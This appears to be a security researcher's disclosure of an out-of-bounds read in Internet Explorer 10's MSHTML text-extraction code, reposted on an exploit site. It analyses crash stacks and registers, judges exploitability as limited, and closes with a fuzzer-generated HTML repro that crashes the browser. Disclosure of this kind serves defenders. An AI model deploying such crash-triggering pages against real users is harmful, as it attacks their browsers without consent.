Microsoft Internet Explorer 10 MSHTML CElement::GetPlainTextInScope Out-Of-Bounds Read



EKU-ID: 6012 CVE: OSVDB-ID:
Author: SkyLined Published: 2016-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the third
entry in that series.

The below information is also available on my blog at
http://blog.skylined.nl/20161103001.html. There you can find a repro
that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 10 MSHTML CElement::GetPlainTextInScope out-of-bounds read
===============================================================

(The fix and CVE number for this bug are not known)

Synopsis
--------
An unknown issue in Microsoft Internet Explorer 10 could cause it to
read data out-of-bounds. This issue was fixed before I was able to
analyze it in detail, hence I did not determine exactly what the root
cause was.

Known affected software
-----------------------
  + Internet Explorer 10

    An attacker would need to get a target user to open a specially
    crafted web-page. No special configuration settings are required in
    order to trigger the issue. No realistic mitigations are known;
    Javascript is not required to trigger the issue.

Description
-----------
My fuzzers were using a predecessor of BugId
(https://github.com/SkyLined/BugId) to generate a report whenever they
found a bug. Unfortunately, this wasn't as sophisticated as BugId is, so
the information contained in these report is not as helpful. Still, I saved
three reports, for crashes with slightly different stacks. This could
have been caused by three different versions of MSIE 10 (every month
when Microsoft released a new version with patches, the code may be
optimized differently, which could explain these differences). It could
also have been caused by the fuzzing framework attempting to reduce the
size of the repro by cutting out chunks, which could lead to slightly
different code-paths. Unfortunately, I do not know which.

Either way, looking at the reports that were automatically generated for
this bug (which can be found at the end of this article), one can find
the following interesting information on all three:
1) The stack tells us that there was a call to `CTextArea::Notify`,
   which suggests the one `textarea` element found in the repro is
   important to triggering the issue.
2) The stack also tells us that there was a call to
   `CElement::GetPlainTextInScope`, which is commonly used to extract
   the text inside an element, so the text content in the `textarea`
   element is probably also important to triggering the issue. Since
   there is no closing `</textarea>` tag, this could be all the data in
   the repro after the opening `<textarea ...>` tag, or up to the first
   closing tag (`</div>`), depending on how the HTML parser works.
3) Clicking on stack `Frame 1` in the report shows the report contains
   some disassembly and registers. Unfortunately, the code that
   generated the disassembly had a bug and started at the wrong
   address, so this isn't very useful. However, clicking on `Registers`
   will show that:
   * The crash happened in `MSHTML!memcpy`
   * the code looked for a unicode linefeed (0x000A) immediately after
     data pointed to by `edx`.
   The `Registers` section does suggest the following:
   * `ecx` was 0, so maybe all the data was already copied at this
      point?
   * `edx` was apparently used as a pointer to the data being copied.

Online documentation for `memcpy` does not mention this behavior of
looking for a linefeed, so it could be that `MSHTML` has an odd
implementation, or that the symbol is simply wrong. I'm assuming that
the code did copy the text content of a `textarea` element and was
looking for a `CR`, `LF` line terminator. Unfortunately, the data at
`edx` only contained one or the other, causing the code to look for the
`LF` outside of the memory area allocated to store the data.

Exploit
-------
The above suggests that there is limit opportunity for exploiting this
issue: it may be possible to determine if a memory block allocated for a
string of an attacker controlled size is followed by a memory block that
starts with the bytes `0A 00`. To better understand the impact, one
would have to get an older version of MSIE 10 and debug the crash.
Unfortunately, I did not have time to do so.

Cheers,

SkyLined



Repro:

?xm?>
<!DO><meta B>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@em><noframes stSSS>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<ins></ins><input type="file"></input type="file">WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW                                            <details style="nav-left: auto !important; list-style-type: lower-greek; fill-opacity: 0.0089285714285714280757932925780551158823072910308837890625; text-align-last: center; writing-mode: rl-tb; fill-rule: nonzero; text-emphasis-style: open dot; marker-end: none; nav-index: 6; color-rendering: inherit" id="id_3" primary='2506545610.1541335502e+266' onwebkitanimationiteration><label><dt></table></dt></summary></input type="password"></figcaption><isindex></isindex>*****************<h3 style="color-interpolation: auto; border-image-outset: 0.0082644628099173556012857488894951529800891876220703125 !important; hyphenate-character: &quot;Rh{Xz*&lt;2Z-Y0i 9H#T`lV|W&lt;X&gt;&amp;Kb4D/[\\4\\[3{wkC$TYu*[m7KE43~x,=oen3Bix-bjm3\)Axr7o3_HBhUU$?W7@&gt;*3_aP#3t&lt;kjcDD!~ VqX *YP05bS5@|&amp;V:2\&quot;xcIaM \&quot;yW?J1olm!9Q\\?@`1*z^h;Zs8NCtj`&lt;^2Q^[gp@H&#x39;qwIiwLr|^UU:\9oKcfL!9;\(wX0///c&gt;tmp5PGSlYC!EYxAC\(&gt;CRZu&gt;!;J:Pv[x}* zsSGxSvTVm&gt;gg$4o=b5sUF3&quot;; -webkit-mask-position: top; -webkit-animation-duration: +6.5ms; -webkit-margin-top-collapse: collapse; text-shadow: none; font: small-caption; -webkit-max-logical-width: intrinsic; caption-side: inherit" style=0x80000001></tbody></progress></noframes><nobr arluenow></nobr><noscript event><var><u ></noscript><input type="t="text"><video ied><p/>^<fyer>/form><b>22nnn+++</b></atosave><textarea id="id_@@@@@@">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj111111111111111777xx}}gg:::::::::::::::::::::::::::::::##^^^^^^^^mmmmmmmmmmmmmmm<legend><div class="class_0" onwaiting=`rgb(220,86,120)` oninvalid>DDhhhhhh</div><frame/><q style="-webkit-transform-origin: left !important; -webkit-box-pack: start; target: inherit; column-rule-width: none; text-decoration-line: line-through; border-width: thin; -webkit-margin-after: 18.80531505%; transition-delay: 23.17ms 3623.285s; -webkit-border-top-right-radius: 0000000000000000000000000000000025699999999% 00000000000000000000000000000000171798691869999999999999999% +000.008264462809917355601285748889495152980089187622070312500em; text-autospace: none" onmousewheel></frame></legend></h4>aVVV&&&&&&<xml/>uuuuuuxxxxx|---<h6/><bgsound></bgsound><datagrid  optimum></xml></form></label><var id="id_4" aria-label=PPP onkeydown='Beige' onstalled=`Olive` maxlength="}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSooooooooo~~~~~~WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW@@xxxxx">.VVVVV\qqq<caption></caption><option id="id_2" datetime/>9999cccppppppp<nolayer aria-readonly/></nolayer><img src="data:image/svg+xml,&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&qua;&lt;!DOCTYPE svg PUBLIC &quot;-//W3C//DTD SVG 1.1//EN&t;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&quot;&gt;&#&lt;svg&;  version=&quot;1.1&quot;&#xd;&#xa;  xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;&#&lt;/svg&gt;&#xd;&#xa;"></option></var></head><body></link><track class="class_5" hreflang onwaiting='sssssssssssssssssssssssssssssss&lt;______________)))))))))))))))))SSSSSS'>88888888888vv(GGGGGGGGSSSSSSSSSSSSSSSSSSSSSSSSSS,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllPeeeVVVVVVVVVVVVVVVVVVVVVVV5555555555599999ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc<dfn><hgroup><noframes indeterminate="M" nowrap=&#xd;&#xd;Ldraggable=FireBrick action=YYYYYYYYYYYYYYTTTKKKKKKKKKKKKKKKQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ...>JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ:::::::::::::::::::::::::::::???????????????????????????????????OOOOOOOOOOOOOOOOOOOOOOOO